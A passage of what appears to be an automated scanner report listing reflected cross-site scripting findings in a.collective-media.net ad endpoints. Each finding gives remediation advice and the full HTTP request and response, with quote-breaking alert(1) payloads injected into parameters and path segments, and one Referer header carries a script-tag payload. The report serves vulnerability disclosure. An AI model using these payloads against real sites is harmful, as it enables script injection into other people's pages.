The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bef0'-alert(1)-'1201f78b2ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.847.CD39C435/ATF?3bef0'-alert(1)-'1201f78b2ae=1 HTTP/1.1
Host: a.collective-media.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dc=dc; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; cli=11d765b6a10b1b3; nadp=1; rdst4=1; rdst3=1;

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 426
Date: Fri, 28 Jan 2011 16:37:18 GMT
Connection: close
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 16:37:18 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF?3bef0'-alert(1)-'1201f78b2ae=1;net=bzo;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.14. http://a.collective-media.net/adj/bzo.847.CD39C435/ATF [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/bzo.847.CD39C435/ATF

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba471'-alert(1)-'37deb8ff8f3 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/bzo.847.CD39C435/ATF;sz=728x90;ord=1296226792127?ba471'-alert(1)-'37deb8ff8f3 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; dc=dc; nadp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 452
Date: Fri, 28 Jan 2011 16:37:17 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Sun, 27-Feb-2011 16:37:17 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/bzo.847.CD39C435/ATF;sz=728x90;net=bzo;ord=1296226792127?ba471'-alert(1)-'37deb8ff8f3;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.15. http://a.collective-media.net/adj/cm.quadbostonherald/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.quadbostonherald/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6981'-alert(1)-'6dd5f2ba05c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.quadbostonheralda6981'-alert(1)-'6dd5f2ba05c/;sz=300x250;ord=[timestamp]? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 449
Date: Sat, 29 Jan 2011 01:54:35 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:35 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.quadbostonheralda6981'-alert(1)-'6dd5f2ba05c/;sz=300x250;net=cm;ord=[timestamp];'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.16. http://a.collective-media.net/adj/cm.quadbostonherald/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.quadbostonherald/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aee13'-alert(1)-'fb692c92488 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.quadbostonherald/;sz=300x250;ord=[timestamp]?&aee13'-alert(1)-'fb692c92488=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 453
Date: Sat, 29 Jan 2011 01:54:33 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:33 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.quadbostonherald/;sz=300x250;net=cm;ord=[timestamp]?&aee13'-alert(1)-'fb692c92488=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.17. http://a.collective-media.net/adj/cm.quadbostonherald/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.quadbostonherald/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14682'-alert(1)-'6bd835e8910 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.quadbostonherald/;sz=300x250;ord=[timestamp]?14682'-alert(1)-'6bd835e8910 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; apnx=1; blue=1; qcdp=1; qcms=1; rdst7=1; rdst8=1; dp1=1; mmpg=1; targ=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 450
Date: Sat, 29 Jan 2011 01:54:25 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:25 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.quadbostonherald/;sz=300x250;net=cm;ord=[timestamp]?14682'-alert(1)-'6bd835e8910;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.18. http://a.collective-media.net/adj/cm.rev_bostonherald/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82f9f'-alert(1)-'d6411e1a08d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rev_bostonherald82f9f'-alert(1)-'d6411e1a08d/;sz=300x250;ord=0.3579352851957083? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc; apnx=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 456
Date: Sat, 29 Jan 2011 01:54:16 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:16 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rev_bostonherald82f9f'-alert(1)-'d6411e1a08d/;sz=300x250;net=cm;ord=0.3579352851957083;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.19. http://a.collective-media.net/adj/cm.rev_bostonherald/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94cda'-alert(1)-'71a1ddadd2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rev_bostonherald/;sz=300x250;ord=0.3579352851957083?&94cda'-alert(1)-'71a1ddadd2=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc; apnx=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 459
Date: Sat, 29 Jan 2011 01:54:15 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:15 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rev_bostonherald/;sz=300x250;net=cm;ord=0.3579352851957083?&94cda'-alert(1)-'71a1ddadd2=1;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.20. http://a.collective-media.net/adj/cm.rev_bostonherald/ [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/cm.rev_bostonherald/

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 75cbe'-alert(1)-'0e5baadaa09 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/cm.rev_bostonherald/;sz=300x250;ord=0.3579352851957083?75cbe'-alert(1)-'0e5baadaa09 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?9HYAALcHCQBs1TAAAAAAACagDQAAAAAAAgAAAAIAAAAAAP8AAAAGEEpSEwAAAAAA3E0TAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA0fwQAAAAAAAIAAgAAAAAAMzMzMzMz4z8zMzMzMzPjPzMzMzMzM-M.MzMzMzMz4z8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADkabZVVyCMCQdR9BcEZzEqrQhaqvUZmvTUBRq8AAAAAA==,,http%3A%2F%2Fad.afy11.net%2Fad%3Fasid%3D1000004165407%26sd%3D2x300x250%26ct%3D15%26enc%3D0%26nif%3D0%26sf%3D0%26sfd%3D0%26ynw%3D0%26anw%3D1%26rand%3D38178276%26rk1%3D15197426%26rk2%3D1296251850.36%26pt%3D0,Z%3D300x250%26s%3D591799%26r%3D0%26_salt%3D195542946%26u%3Dhttp%253A%252F%252Fad.afy11.net%252Fad%253FasId%253D1000004165407%2526sd%253D2x300x250%2526ct%253D15%2526enc%253D0%2526nif%253D0%2526sf%253D0%2526sfd%253D0%2526ynw%253D0%2526anw%253D1%2526rand%253D38178276%2526rk1%253D15197426%2526rk2%253D1296251850.36%2526pt%253D0,a1b64ea0-2b29-11e0-8dc4-003048d6cfae
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc; apnx=1; blue=1; qcdp=1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 457
Date: Sat, 29 Jan 2011 01:54:10 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:10 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://k.collective-media.net/cmadj/cm.rev_bostonherald/;sz=300x250;net=cm;ord=0.3579352851957083?75cbe'-alert(1)-'0e5baadaa09;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.21. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 98116'-alert(1)-'3c9c0ba56be was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.revinet.bostonherald98116'-alert(1)-'3c9c0ba56be/audience;sz=300x250;ord=0.9691057777963579? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 478
Date: Sat, 29 Jan 2011 01:54:11 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:11 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald98116'-alert(1)-'3c9c0ba56be/audience;sz=300x250;net=iblocal;ord=0.9691057777963579;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.22. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.revinet.bostonherald/audience

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8cd63'-alert(1)-'d2cf8b42732 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.revinet.bostonherald/audience8cd63'-alert(1)-'d2cf8b42732;sz=300x250;ord=0.9691057777963579? HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
P3P: policyref="http://a.collective-media.net/static/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Length: 478
Date: Sat, 29 Jan 2011 01:54:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: dc=dc; domain=collective-media.net; path=/; expires=Mon, 28-Feb-2011 01:54:12 GMT

var cmPageUrl; if(self == top) cmPageURL = document.location.href; else cmPageURL = document.referrer;
var ifr = (self==top ? '' : 'env=ifr;');
document.write('<scr'+'ipt language="javascript" src="http://a.collective-media.net/cmadj/iblocal.revinet.bostonherald/audience8cd63'-alert(1)-'d2cf8b42732;sz=300x250;net=iblocal;ord=0.9691057777963579;'+ifr+'ord1=' +Math.floor(Math.random() * 1000000) + ';cmpgurl='+escape(escape(cmPageURL))+'?">
...[SNIP]...

4.23. http://a.collective-media.net/adj/iblocal.revinet.bostonherald/audience [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /adj/iblocal.revinet.bostonherald/audience

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6976e'-alert(1)-'f30758ceea3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adj/iblocal.revinet.bostonherald/audience;sz=300x250;ord=0.9691057777963579?&6976e'-alert(1)-'f30758ceea3=1 HTTP/1.1
Host: a.collective-media.net
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle2&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cli=11d765b6a10b1b3; JY57=3JMjrL1S-uGfusGWd_j0ejQY2VtC6hXRBbwanTCLwoyhQVr_N6dpe_A; rdst4=1; rdst3=1; nadp=1; dc=dc

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Content-Type: application/x-javascript
